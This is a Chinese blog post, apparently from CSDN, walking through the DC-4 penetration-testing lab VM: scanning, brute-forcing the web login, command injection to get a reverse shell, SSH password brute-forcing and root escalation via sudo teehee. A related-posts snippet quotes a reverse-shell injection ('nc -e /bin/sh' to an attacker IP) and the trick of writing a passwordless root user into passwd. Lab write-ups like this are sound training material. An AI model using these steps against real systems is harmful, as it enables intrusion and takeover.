关于DC-4靶机的实战

最新推荐文章于 2024-03-30 19:49:57 发布
最新推荐文章于 2024-03-30 19:49:57 发布
阅读量274 收藏
点赞数
文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/PigLL/article/details/108023936
版权

实验环境
一台DC-4靶机
一台kali攻击机
同是NAT模式
使DC-4和kali在同一网段

1.信息收集
首先确定kali的IP地址
在这里插入图片描述
利用nmap扫描同网段网址
在这里插入图片描述
因为192.168.137.130为kali的IP
所以192.168.137.137为DC-4的IP

在这里插入图片描述
通过对DC-4的扫描发现22端口和80端口是开放的

在这里插入图片描述
通过网页访问192.168.137.137 发现登陆页面
在这里插入图片描述
利用抓包工具抓包
然后将抓到的包发送到intruder模块
在这里插入图片描述
在这里插入图片描述
第一个字典添加admin 信息
在这里插入图片描述
第二个字典找一个爆破字典放进去进行爆破
在这里插入图片描述
爆破出来的结果为happy
在这里插入图片描述
在网页中输入密码
在这里插入图片描述
继续用BP抓包
在这里插入图片描述
发现可以改变上传的值,然后发送到repeater模块
将radio的值改为pwd 可以看到当前路径
在这里插入图片描述
然后在kali上监听4444端口
在这里插入图片描述
将radio的值改了然后send发送
在这里插入图片描述
回到kali 发现反弹shell成功
在这里插入图片描述
看一下用户信息
在这里插入图片描述
看到jim和sam两个用户在这里插入图片描述
爆破jim账户的密码
在这里插入图片描述
使用jim账户远程登录ssh
在这里插入图片描述
发现有邮件 查看一下
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
通过上面找到的密码切换charles
在这里插入图片描述
发现不能用charles直接提权
然后teehee用户可以不用密码得到root权限
在这里插入图片描述
创建一个用户
在这里插入图片描述
提升用户权限
在这里插入图片描述
在这里插入图片描述
WELL DONE!!!

CAG.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
dc-4靶机练习.docx
01-02
第一步;靶机在web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新... 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有root权限
DC4靶机
2301_77132421的博客
04-06 107
将ls+-l改成nc -e /bin/sh 192.168.91.129 8888,点击forward放行。利用teehee的root权限在passwd中写入一个免密的root权限用户。进过查找, 在var目录发现mail,打开jim的邮件看看。对jim用户进行密码爆破,字典就用刚才找到的1.txt。登录成功,但是登录的时候它多出来一句话,可以翻译下看看。成功进入,但是进的时候要注意把用户大写的C换成小写。将所有密码拷贝,粘贴到kali的root目录下。找到了一个存放密码的文件。给和密码加上&准备爆破。
靶机DC-4—WP
m0_66638011的博客
06-22 739
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。DC-4靶场攻破过程:1.首先我们进行主机发现,将测试机的网站进行了指纹扫描,发现它没有任何框架。2.然后我们进行bp抓包,发现了暴力破解漏洞。
DC-4靶场实战
最新发布
qq_42754807的博客
03-30 708
DC-4靶场实战
DC-4靶机渗透测试
今天不学习 明天变垃圾
04-18 695
DC-4
DC-4靶机渗透
weixin_45349299的博客
12-21 904
开放的端口:22 => ssh服务 ---- OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)80 => http服务 ---- nginx 1.15.10扫描出来的网站目录。
dc-4 靶机渗透学习
..
03-19 2943
信息收集 第一步还是老办法,探测主机存活。 nmap -sP 192.168.202.0/24 通过推断得出192.168.202.142是靶机,具体请看dc-2、dc-3,对靶机进行端口扫描。 nmap -A -p- -v 192.168.202.142 发现22、80端口开启,访问一下80端口,发现是个登录页面。 用Wappalyzer识别框架,没试别出,查看源代码发现只是一个简单的登录界面 这种情况感觉没必要再用nikto扫描了,尝试用bp爆...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
DC-4靶机提权超详细过程
02-29
本资源主要讲述了DC-4靶机提权拿到flag的全部详细过程,每一个步骤都有详细记录,希望可以帮助到大家。 (因为我把笔记导出为了pdf版本,所以只能用这种形式发出,该资源不需要消耗积分,也不需要付费哦,可放心使用...
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
DC-4渗透靶机详解
weixin_51083551的博客
09-12 3991
萌新DC系列靶机渗透详解之 DC-4 “DC-3好难呜呜,先打DC-4” 1. 明确目标 获得靶机 root 权限,找到root账户下的 flag 2. 信息收集 使用 arp-scan 扫描网段下的主机 └─# arp-scan -l
DC-4靶场渗透】
一纸荒芜的博客
07-04 1902
DC-4渗透
linux window文件格式转linux文件格式
loyaltylzr的专栏
12-28 1350
(1)使用linux命令dos2unix filename,直接把文件转换为unix格式; (2)使用sed命令sed -i "s/\r//" filename 或者 sed -i "s/^M//" filename直接替换结尾符为unix格式; (3)vi filename打开文件,执行 : set ff=unix 设置文件为unix,然后执行:wq,保存成unix格式。 查看脚本文件是dos...
靶机5 DC-4(过程超详细)
honest_gg的博客
09-26 1245
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-4 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-06 964
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-4 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
DC-4靶机详细渗透过程
MRS_jianai的博客
11-30 482
dc4靶机渗透教程
渗透测试学习之靶机DC-4
xdbzdgx的博客
11-18 3615
1.下载靶机 本篇文章是DC靶机系列的第四篇,针对的是靶机DC-4,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。 DC-4的下载地址为DC: 5 ~ VulnHub。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 同样地,DC-4只有一个flag。 在VMware加载成功之后显示如下界面: 默认状态我们是打不开该系统的,也不知道账号密码的,毕竟我们的目的就是在不知道账号密码的情况下拿到ro
渗透DC-1靶机设计思路
05-24
2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值